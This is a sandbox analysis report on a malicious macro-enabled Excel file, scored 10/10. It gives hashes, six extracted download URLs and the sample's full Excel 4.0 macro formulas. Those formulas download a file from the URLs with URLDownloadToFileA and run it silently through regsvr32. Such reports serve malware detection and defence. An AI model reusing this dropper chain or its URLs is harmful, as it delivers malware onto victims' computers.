Overview

overview

10

Static

static

10

a325a62583...0.xlsm

windows7-x64

10

a325a62583...0.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    a325a62583065b07d4471f068e9c23e0f2f8c40bd3c996687e4e93674e7e44f0

  • Size

    48KB

  • Sample

    241120-dg7e5stpgj

  • MD5

    74f3ea32b06ea2f4718dfa817dae7d84

  • SHA1

    343777fac4b631c68172990fe90953e65d403993

  • SHA256

    a325a62583065b07d4471f068e9c23e0f2f8c40bd3c996687e4e93674e7e44f0

  • SHA512

    0382262e8dfcd314008ec9a9f64349e0a6c7e71d8aa2e858ce4901281b9ee4cba81f7e1cb5d2d597969b5bc4b40db64568e5c2ec485e32e20ffe14ef086eff2d

  • SSDEEP

    768:Y2uCkFF/vxRhR0KDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0BAR5:vuTlbMKDNck01u/R2rZyjB+5

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://henrysfreshroast.com/OevI7Yy0i6YShxFl/

http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/

http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/

https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/

http://1000paginas.com/tienda/vWtT/

http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/OevI7Yy0i6YShxFl/","..\si.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/","..\si.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/","..\si.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/","..\si.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://1000paginas.com/tienda/vWtT/","..\si.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/","..\si.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\si.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://henrysfreshroast.com/OevI7Yy0i6YShxFl/

Targets

    • Target

      a325a62583065b07d4471f068e9c23e0f2f8c40bd3c996687e4e93674e7e44f0

    • Size

      48KB

    • MD5

      74f3ea32b06ea2f4718dfa817dae7d84

    • SHA1

      343777fac4b631c68172990fe90953e65d403993

    • SHA256

      a325a62583065b07d4471f068e9c23e0f2f8c40bd3c996687e4e93674e7e44f0

    • SHA512

      0382262e8dfcd314008ec9a9f64349e0a6c7e71d8aa2e858ce4901281b9ee4cba81f7e1cb5d2d597969b5bc4b40db64568e5c2ec485e32e20ffe14ef086eff2d

    • SSDEEP

      768:Y2uCkFF/vxRhR0KDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0BAR5:vuTlbMKDNck01u/R2rZyjB+5

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks